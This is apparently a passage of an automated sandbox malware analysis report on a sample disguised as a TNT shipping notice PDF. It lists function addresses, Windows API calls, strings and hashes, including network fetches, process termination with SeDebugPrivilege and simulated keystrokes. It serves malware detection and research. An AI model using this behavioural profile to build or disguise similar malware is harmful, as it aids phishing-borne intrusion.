Instruction Fuzzy Hash: 0911367A68C327B9F6013325EC06CE6379CDF16328B200026FB04E40E6FE65A8255718

Function 008FCE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 008FCEB7
_free.LIBCMT ref: 008FCF22
_free.LIBCMT ref: 008FCF48
_free.LIBCMT ref: 008FCF71
_free.LIBCMT ref: 008FCFA9
_free.LIBCMT ref: 008FCFDA
_free.LIBCMT ref: 008FD01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 008FD09C
_free.LIBCMT ref: 008FD0B5

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 0fa28af8f729c76d4f5c1dacfe20ed30c6217863c1dae78033d9ab516a3654ca
Instruction ID: 33fc7418d781998c670750ecc28921bc930601fdae71aa87b89645a4b78a3ad4
Opcode Fuzzy Hash: 0fa28af8f729c76d4f5c1dacfe20ed30c6217863c1dae78033d9ab516a3654ca
Instruction Fuzzy Hash: 15615871A0430DAFDB21AFB89981A7ABBA5FF41310F14016EFB01D7282DB719E019761

Function 009550D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00955186
ShowWindow.USER32(?,00000000), ref: 009551C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 009551CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 009551D1

Part of subcall function 00956FBA: DeleteObject.GDI32(00000000), ref: 00956FE6

GetWindowLongW.USER32(?,000000F0), ref: 0095520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0095521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0095524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00955287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00955296

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 5015666aacb92a6f0f70d0b8f5dc05786480eb722322df54709f3c95749ff9a7
Instruction ID: 5fe57e20f6ad92e21207dc78297ea31dfec67fdfe3dda12607939799b18bd1c2
Opcode Fuzzy Hash: 5015666aacb92a6f0f70d0b8f5dc05786480eb722322df54709f3c95749ff9a7
Instruction Fuzzy Hash: F451C270A58A09BEEF20DF26CC55B983BA9FB05322F154102FD25962E2C375E988DB41

Function 008D8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00916890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 009168A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009168B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 009168D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009168F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,008D8874,00000000,00000000,00000000,000000FF,00000000), ref: 00916901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0091691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,008D8874,00000000,00000000,00000000,000000FF,00000000), ref: 0091692D

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 0312c35e0c6ab20a8bb037ce36e56df17972dd25fc1938641de4f3bfea1645fd
Instruction ID: 7f9327516059d9dc487982362988916c002d8c41decbf873c4c40324f7249eef
Opcode Fuzzy Hash: 0312c35e0c6ab20a8bb037ce36e56df17972dd25fc1938641de4f3bfea1645fd
Instruction Fuzzy Hash: 84518C70A10309EFDB24CF29CC51FAA7BB5FB44361F10461AF952D62A0DB70E990DB50

Function 0093C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0093C182
GetLastError.KERNEL32 ref: 0093C195
SetEvent.KERNEL32(?), ref: 0093C1A9

Part of subcall function 0093C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0093C272
Part of subcall function 0093C253: GetLastError.KERNEL32 ref: 0093C322
Part of subcall function 0093C253: SetEvent.KERNEL32(?), ref: 0093C336
Part of subcall function 0093C253: InternetCloseHandle.WININET(00000000), ref: 0093C341

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 072bc0a44d698b7a6683551b01a98b27205fd21068f0e33086a8ca7d7037f7f9
Instruction ID: 707275571bd85204e92ec83d2557410b637ce347524eb7e73a2ac0b551d53a13
Opcode Fuzzy Hash: 072bc0a44d698b7a6683551b01a98b27205fd21068f0e33086a8ca7d7037f7f9
Instruction Fuzzy Hash: FF317AB1204B05AFDB219FA6DC44A67BBECFF58311F00441DF96AA6610D730E814EFA0

Function 009225A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00923A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00923A57
Part of subcall function 00923A3D: GetCurrentThreadId.KERNEL32 ref: 00923A5E
Part of subcall function 00923A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009225B3), ref: 00923A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 009225BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009225DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 009225DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 009225E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00922601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00922605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0092260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00922623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00922627

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 9e2a511cdb2cfbc042a4858023131243aa42085f36629bbea16dd3a40a806344
Instruction ID: c8ad310e057d9151277e741b05019b91230c9807098baf02b5c361c5b0796f89
Opcode Fuzzy Hash: 9e2a511cdb2cfbc042a4858023131243aa42085f36629bbea16dd3a40a806344
Instruction Fuzzy Hash: 2F01D4713A8720BBFB1067699C8AF593F99DB8EB12F100012F318AE1D5C9E224449A69

Function 00921803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00921449,?,?,00000000), ref: 0092180C
HeapAlloc.KERNEL32(00000000,?,00921449,?,?,00000000), ref: 00921813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00921449,?,?,00000000), ref: 00921828
GetCurrentProcess.KERNEL32(?,00000000,?,00921449,?,?,00000000), ref: 00921830
DuplicateHandle.KERNEL32(00000000,?,00921449,?,?,00000000), ref: 00921833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00921449,?,?,00000000), ref: 00921843
GetCurrentProcess.KERNEL32(00921449,00000000,?,00921449,?,?,00000000), ref: 0092184B
DuplicateHandle.KERNEL32(00000000,?,00921449,?,?,00000000), ref: 0092184E
CreateThread.KERNEL32(00000000,00000000,00921874,00000000,00000000,00000000), ref: 00921868

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 3bcf7c423884c2f4a80345a836ed1bce9ae0812ec2fd0b4ab519ae710cf99e8b
Instruction ID: e7413ebd22750ebf7f1c569e697968e13808d296c4eadec24126907055c1f403
Opcode Fuzzy Hash: 3bcf7c423884c2f4a80345a836ed1bce9ae0812ec2fd0b4ab519ae710cf99e8b
Instruction Fuzzy Hash: A001BBB5654708BFE710ABB6EC4DF6B3BACEB89B11F004411FA05DB1A1CA709840DB20

Function 0094A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0092D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0092D501
Part of subcall function 0092D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0092D50F
Part of subcall function 0092D4DC: CloseHandle.KERNEL32(00000000), ref: 0092D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0094A16D
GetLastError.KERNEL32 ref: 0094A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0094A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0094A268
GetLastError.KERNEL32(00000000), ref: 0094A273
CloseHandle.KERNEL32(00000000), ref: 0094A2C4

Strings

SeDebugPrivilege, xrefs: 0094A18F

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 892b7c6f3ddbdeab1424d6b4820426d3ce1d6aff5032a89d79b89fab0701f452
Instruction ID: 391c5a023438660c747f6b646d65bd4f7fc40afc44f156c2c03a7e3a030b62ee
Opcode Fuzzy Hash: 892b7c6f3ddbdeab1424d6b4820426d3ce1d6aff5032a89d79b89fab0701f452
Instruction Fuzzy Hash: DD61BF702482429FD720DF19C494F1ABBE5EF44318F14849CE4668B7A3C7B6EC45DB92

Function 00953886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00953925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0095393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00953954
_wcslen.LIBCMT ref: 00953999
SendMessageW.USER32(?,00001057,00000000,?), ref: 009539C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 009539F4

Strings

SysListView32, xrefs: 009538F7

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 30afb7017f10d8f4fba4d178bc3ea26ed8bc032f536f32793cd8ececf6d2a790
Instruction ID: e72b1fb5fc0346c53926b8c868366d9ec7bbb3736f3f2294f1ef175d1da97a58
Opcode Fuzzy Hash: 30afb7017f10d8f4fba4d178bc3ea26ed8bc032f536f32793cd8ececf6d2a790
Instruction Fuzzy Hash: 5441F271A00309ABEF21DF65CC45BEA7BA9FF08391F104526F948E7281D370DA84CB90

Function 0092BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0092BCFD
IsMenu.USER32(00000000), ref: 0092BD1D
CreatePopupMenu.USER32 ref: 0092BD53
GetMenuItemCount.USER32(00EA62C8), ref: 0092BDA4
InsertMenuItemW.USER32(00EA62C8,?,00000001,00000030), ref: 0092BDCC

Strings

0, xrefs: 0092BCA8
2, xrefs: 0092BD37

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: b9969334eeead814a612981f3b226612cbcd255e2be9c161a2de2d64b78da4f2
Instruction ID: 90ac225e7afb40871f0a8dbc7f8c2a126e7c73d8e19ccceec36c630e43f6ee35
Opcode Fuzzy Hash: b9969334eeead814a612981f3b226612cbcd255e2be9c161a2de2d64b78da4f2
Instruction Fuzzy Hash: 9651DDB0A043259BDB10CFA9E888BEEBBF8BF85314F148519E551D72D8E7709941CBA1

Function 0092C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0092C913

Strings

blank, xrefs: 0092C895
warning, xrefs: 0092C8FC
stop, xrefs: 0092C8E4
question, xrefs: 0092C8CC
info, xrefs: 0092C8B4

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: d9c39ce80f11296d47c1c7eb7446ff18fc2d190ab8f1cd9646a18fd33032d0e7
Instruction ID: 98da9df92e1138c46edcdd827225f13efa2572955c53853e2d9abc4c8d1bac8d
Opcode Fuzzy Hash: d9c39ce80f11296d47c1c7eb7446ff18fc2d190ab8f1cd9646a18fd33032d0e7
Instruction Fuzzy Hash: C2115075689326BEE7006B55FC83CAE379CDF16329B10003AF504EA2C2D7B45E4053A9

Function 0092ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0092ED2A
_wcslen.LIBCMT ref: 0092ED3B
_wcslen.LIBCMT ref: 0092ED79
_wcslen.LIBCMT ref: 0092EDAF
_wcslen.LIBCMT ref: 0092EDDF
_wcslen.LIBCMT ref: 0092EDEF
_wcslen.LIBCMT ref: 0092EE2B
_wcslen.LIBCMT ref: 0092EE5A

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 3d36934d70a1a90d4f1107d2c71de45a85619464e782c498e1ebe70a3877f71a
Instruction ID: a8aec179e9046954c4a4e7d1ca932960ce513719838464756bb68e4cc01516b8
Opcode Fuzzy Hash: 3d36934d70a1a90d4f1107d2c71de45a85619464e782c498e1ebe70a3877f71a
Instruction Fuzzy Hash: CE418065C1026875CB11EBB9988A9CFB7A8FF46710F508462F618F3122FB34E255C7E6

Function 008DF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0091682C,00000004,00000000,00000000), ref: 008DF953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0091682C,00000004,00000000,00000000), ref: 0091F3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0091682C,00000004,00000000,00000000), ref: 0091F454

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 865776342da0135aa6ead54e432ee37d05429bf0319fea5819b6e69d65a7470a
Instruction ID: 5b3b315c3f3b541ba6e6d7547699b4cc5bf41f659ab81d58347ae6f98c24f848
Opcode Fuzzy Hash: 865776342da0135aa6ead54e432ee37d05429bf0319fea5819b6e69d65a7470a
Instruction Fuzzy Hash: CE413B70A18788BEC7398B2D88B876A7F91FB46324F14463EE247D6762C63198C1F711

Function 00952D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00952D1B
GetDC.USER32(00000000), ref: 00952D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00952D2E
ReleaseDC.USER32(00000000,00000000), ref: 00952D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00952D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00952D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00955A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00952DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00952DE1

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 0ad5a461b26bd2024e1c9adcee824acf47698425478ace46b8dc90428a16d48e
Instruction ID: 8dffad452650450856a82845283354a534e1812682a2a27874a249c496861d0b
Opcode Fuzzy Hash: 0ad5a461b26bd2024e1c9adcee824acf47698425478ace46b8dc90428a16d48e
Instruction Fuzzy Hash: C0316BB2215314BFEF118F518C8AFEB3BADEB0A716F044055FE089A291C6759C50CBA4

Function 00925622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00925637
_memcmp.LIBVCRUNTIME ref: 00925659
_memcmp.LIBVCRUNTIME ref: 00925671
_memcmp.LIBVCRUNTIME ref: 00925684
_memcmp.LIBVCRUNTIME ref: 0092569E
_memcmp.LIBVCRUNTIME ref: 009256B1
_memcmp.LIBVCRUNTIME ref: 009256C9
_memcmp.LIBVCRUNTIME ref: 009256E4

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: c4e7e7429b69b7c307dccb818abfa6e22af53e8b2252b924c7698deb6dd96fc3
Instruction ID: 9d5cf7770066d4569d7dd376894a456cb81ff84df9fbd972e74313b8c7c6b2ff
Opcode Fuzzy Hash: c4e7e7429b69b7c307dccb818abfa6e22af53e8b2252b924c7698deb6dd96fc3
Instruction Fuzzy Hash: 29214971A41A6877DA14D522AE92FFB334CFF61399F450030FD04DA689F738ED1482A6

Function 00944FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00945007
NULL Pointer assignment, xrefs: 0094502E, 00945383

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 433ecd38605def099e902f60c02ce9bf8c1884df81d0c6e9955d7c3ad471cd6e
Instruction ID: c282e810a96198260d3c8a81ac721b2c12230f03aae04b79c3730598532fffad
Opcode Fuzzy Hash: 433ecd38605def099e902f60c02ce9bf8c1884df81d0c6e9955d7c3ad471cd6e
Instruction Fuzzy Hash: A0D1C275A0070AAFDF10CF98C881FAEB7B9BF48344F158569E915AB282E770DD45CB50

Function 00901522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,009017FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 009015CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,009017FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00901651
